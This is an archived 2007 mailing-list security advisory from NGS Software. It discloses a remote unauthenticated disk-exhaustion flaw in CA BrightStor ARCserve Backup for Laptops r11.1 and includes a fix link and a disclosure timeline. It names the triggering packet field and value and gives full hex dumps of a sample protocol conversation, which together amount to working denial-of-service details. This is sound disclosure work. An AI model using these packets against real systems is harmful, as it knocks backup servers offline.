lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Wed, 31 Jan 2007 01:58:43 -0000
From: "NGS Software Insight Security Research" <mark@...bery.com>
To: <bugtraq@...urityfocus.com>, <vulnwatch@...nwatch.org>,
	<full-disclosure@...ts.netsys.com>
Subject: Remote Unauthenticated Resource Exhaustion CA Mobile BackupService

=======
Summary
=======
Today: 31 January 2007
Reference: NGS00401
Discover: Mark Litchfield; John Heasman
Name: Remote Unauthenticated Resource Exhaustion Mobile BackupService
Vendor: Computer Associates
Systems Affected: BrightStor ARCserve Backup for Laptops & Desktops r11.1
Risk: Medium
Status: Published

========
TimeLine
========
Discovered: 19 June 2006
Released: 19 June 2006
Approved: 19 June 2006
Reported: 22 June 2006
Fixed: 23 January 2007
Published: 30 January 2007

===========
Description
===========
By sending a specially crafted series of packets to the LGSERVER.EXE
process that listens on TCP port 2200, it is possible to cause
LGSERVER.EXE to write very large files to the system disk. In addition,
the LGSERVER.EXE process becomes unresponsive until the file has been
written.

=================
Technical Details
=================
Upon every authentication attempt to LGSERVER.EXE a file is created within
D:\CA_BABLDdata\Server\data\transfer.  This file has an extention of .USX
which would take the format of something like (where X is equal to 0-9 or
A-F) - RWXXX.usx

During the negotiation, within the third packet at HEX address of (DWORD)
0x15 - 0x18, you will normally see the value 0x00 0x00 0x00 0x00 followed
by CoreDataDB.

When sending this packet the contents are written to this USX file.
However, if we pass a DWORD value of 0xff 0xff 0xff 0x7f at the address
0x15-0x18, we write an additional 2,096,153KB NULLS to the USX file.

*********************************************************************************************************************

Sample Conversation:

Client:-  (Packet 1)

Raw Data
    4e 3d 2c 1b 00 00 00 00 00 00 00 00 00 00 00 00  (N=,             )
    00 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00  (                )
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  (                )
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  (                )
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  (                )
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  (                )
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  (                )
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  (                )
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  (                )
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  (                )
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  (                )
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  (                )
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  (                )
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  (                )
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  (                )
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  (                )
    00 00 00 00                                      (    )

Server:-

Raw Data
    4e 3d 2c 1b 00 00 00 00 fe 00 00 00 00 00 00 00  (N=,             )
    00 00 00 00 00 00 00 00                          (        )

Server:-

Raw Data
    4e 3d 2c 1b 00 00 00 00 ff 00 00 00 00 00 00 00  (N=,             )
    00 00 00 00 00 00 00 00                          (        )

Client:- (Packet 2)

Raw Data
    4e 3d 2c 1b 00 00 00 00 02 00 00 00 00 00 00 00  (N=,             )
    06 00 00 00 ce 03 00 00 52 57 31 42 34 00        (        RW1B4 )

Server:-

Raw Data
    4e 3d 2c 1b 00 00 00 00 fe 00 00 00 00 00 00 00  (N=,             )
    00 00 00 00 00 00 00 00                          (        )

Client:-  (Packet 3)

Raw Data
    4e 3d 2c 1b 00 00 00 00 03 00 00 00 00 00 00 00  (N=,             )
    ce 03 00 00 00 00 00 00 43 6f 72 65 44 61 74 61  (        CoreData)
    44 42 00 00 01 00 00 00 00 00 0a 00 ce 03 00 00  (DB              )
    00 00 00 00 01 00 00 00 10 00 00 00 00 00 00 00  (                )
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  (                )
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  (                )
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  (                )
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  (                )
    00 00 00 02 00 00 00 00 00 00 4a 00 00 00 00 00  (          J     )
    00 01 4a 02 00 00 00 00 00 00 00 00 00 00 00 00  (  J             )
    00 00 4a 02 00 00 00 00 00 00 50 00 00 00 00 00  (  J       P     )
    00 01 9a 02 00 00 00 00 00 00 00 00 00 00 00 00  (                )
    00 00 9a 02 00 00 00 00 00 00 52 00 00 00 00 00  (          R     )
    00 01 ec 02 00 00 00 00 00 00 04 00 00 00 00 00  (                )
    00 00 f0 02 00 00 00 00 00 00 52 00 00 00 00 00  (          R     )
    00 01 42 03 00 00 00 00 00 00 0c 00 00 00 00 00  (  B             )
    00 00 4e 03 00 00 00 00 00 00 14 00 00 00 00 00  (  N             )
    00 02 62 03 00 00 00 00 00 00 04 00 00 00 00 00  (  b             )
    00 00 66 03 00 00 00 00 00 00 12 00 00 00 00 00  (  f             )
    00 02 78 03 00 00 00 00 00 00 04 00 00 00 00 00  (  x             )
    00 00 7c 03 00 00 00 00 00 00 0e 00 00 00 00 00  (  |             )
    00 02 8a 03 00 00 00 00 00 00 17 00 00 00 00 00  (                )
    00 00 a1 03 00 00 00 00 00 00 11 00 00 00 00 00  (                )
    00 02 b2 03 00 00 00 00 00 00 1c 00 00 00 00 00  (                )
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  (                )
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  (                )
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  (                )
    00 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00  (                )
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  (                )
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  (                )
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  (                )
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  (                )
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  (                )
    00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00  (                )
    00 00 01 00 00 00 03 00 00 00 f0 b4 00 00 00 00  (                )
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  (                )
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  (                )
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  (                )
    00 00 01 00 00 00 04 00 00 00 06 00 43 6f 6e 66  (            Conf)
    69 67 06 00 00 00 05 00 00 00 29 9f 07 00 00 00  (ig        )     )
    12 92 09 00 00 00 1f 9b 0b 00 00 00 57 92 0d 00  (            W   )
    00 00 b6 ad 0f 00 00 00 72 9c 00 00 00 00 00 00  (        r       )
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  (                )
    00 00 03 00 00 00 06 00 00 00 08 00 55 73 65 72  (            User)
    4e 61 6d 65 00 00 00 00 00 00 00 00 00 00 00 00  (Name            )
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  (                )
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  (                )
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  (                )
    00 00 00 00 6d 61 72 6b 03 00 00 00 08 00 00 00  (    mark        )
    08 00 50 61 73 73 77 6f 72 64 00 00 00 00 00 00  (  Password      )
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  (                )
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  (                )
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  (                )
    00 00 00 00 00 00 00 00 00 00 6a 86 fb b5 8d 2b  (          j    +)
    1b a4 40 e1 b6 73 03 00 00 00 0a 00 00 00 0a 00  (  @  s          )
    55 73 65 72 53 74 61 74 75 73 11 00 00 00 03 00  (UserStatus      )
    00 00 0c 00 00 00 08 00 43 6f 64 65 50 61 67 65  (        CodePage)
    e4 04 00 00 03 00 00 00 0e 00 00 00 04 00 48 6f  (              Ho)
    73 74 67 73 72 6c 2d 74 65 73 74 2e 67 73 72 6c  (stgsrl-test.gsrl)
    2d 74 65 73 74 2e 6e 65 74 03 00 00 00 10 00 00  (-test.net       )
    00 07 00 56 65 72 73 69 6f 6e 31 31 2e 31 2e 37  (   Version11.1.7)
    34 32 3a 57 69 6e 64 6f 77 73 20 53 65 72 76 65  (42:Windows Serve)
    72 20 32 30 30 33                                (r 2003)

Client:- (Packet 4)

Raw Data
    4e 3d 2c 1b 00 00 00 00 04 00 00 00 00 00 00 00  (N=,             )
    00 00 00 00 00 00 00 00                          (        )

Server:-

Raw Data
    4e 3d 2c 1b 00 00 00 00 fe 00 00 00 00 00 00 00  (N=,             )
    00 00 00 00 00 00 00 00                          (        )

===============
Fix Information
===============
http://supportconnectw.ca.com/public/sams/lifeguard/infodocs/babldimpsec-notice.asp

NGSSoftware Insight Security Research
http://www.ngssoftware.com
http://www.databasesecurity.com/
http://www.nextgenss.com/
+44(0)208 401 0070


--
E-MAIL DISCLAIMER

The information contained in this email and any subsequent
correspondence is private, is solely for the intended recipient(s) and
may contain confidential or privileged information. For those other than
the intended recipient(s), any disclosure, copying, distribution, or any
other action taken, or omitted to be taken, in reliance on such
information is prohibited and may be unlawful. If you are not the
intended recipient and have received this message in error, please
inform the sender and delete this mail and any attachments.

The views expressed in this email do not necessarily reflect NGS policy.
NGS accepts no liability or responsibility for any onward transmission
or use of emails and attachments having left the NGS domain.

NGS and NGSSoftware are trading names of Next Generation Security
Software Ltd. Registered office address: 52 Throwley Way, Sutton, SM1
4BF with Company Number 04225835 and VAT Number 783096402

Powered by blists - more mailing lists